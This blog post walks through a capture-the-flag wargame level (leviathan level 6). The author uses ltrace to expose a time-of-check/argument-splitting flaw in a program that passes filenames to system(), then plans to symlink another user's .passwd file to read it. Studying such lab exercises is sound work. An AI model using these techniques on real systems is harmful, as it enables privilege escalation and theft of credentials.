15 November 2010

leviathan level 6 wargame at intruded.net (6/8) wargames

This program seems to print file (printfile) located in /wargame... if run them:

level6@leviathan:/wargame$ ./printfile
*** File Printer ***
Usage: ./printfile filename

Trying to read the password of next level...

level6@leviathan:/wargame$ ln -s /home/level7/.passwd /tmp/passwd
level6@leviathan:/wargame$ ./printfile /tmp/pass
You cant have that file...

Don't work... let's see with ltrace...

level6@leviathan:/wargame$ ltrace ./printfile /tmp/passwd
__libc_start_main(0x8048424, 2, 0xbffffd34, 0x8048570, 0x8048520
access("/tmp/passwd", 0)                         = -1
puts("You cant have that file..."You cant have that file...
)               = 27
+++ exited (status 1) +++

Check the permissions before show the file... ok, feed the program with correct permisions file...

level6@leviathan:/wargame$ echo "Hi" > /tmp/world
level6@leviathan:/wargame$ ./printfile /tmp/world

Seems work fine, ltrace this...

level6@leviathan:/wargame$ ltrace ./printfile /tmp/world
__libc_start_main(0x8048424, 2, 0xbffffd34, 0x8048570, 0x8048520
access("/tmp/world", 0)                          = 0
snprintf("/bin/cat /tmp/world", 511, "/bin/cat %s", "/tmp/world") = 19
system("/bin/cat /tmp/world"Hi
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 0
+++ exited (status 0) +++

Works fine, use system call for show the contents.. and construct the string with snprintf... 

Solution: construct string with snprintf permits to inject more commands :)

level6@leviathan:/wargame$ ltrace ./printfile "/tmp/hello world"
__libc_start_main(0x8048424, 2, 0xbffffd34, 0x8048570, 0x8048520
access("/tmp/hello world", 0)                    = 0
snprintf("/bin/cat /tmp/hello world", 511, "/bin/cat %s", "/tmp/hello world") = 25
system("/bin/cat /tmp/hello world"/bin/cat: /tmp/hello: No such file or directory
/bin/cat: world: No such file or directory
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 256
+++ exited (status 0) +++

Whatch this... access perform over "hello world" file, but cat, try to watch "/tmp/hello" and "world" :) easy, create "hello world" with some garbage inside, and link hello to passwd file :)

Posted at BinaryCell

No comments:

Post a Comment

Disclaimer: In no event shall the blog owner, be liable for any damages, including without limitation, special, indirect or consequential damages, or any damages, whatsoever resulting from access or use, or inability to access or use this Website or arising out of any materials, information, qualifications or recommendations on this Website.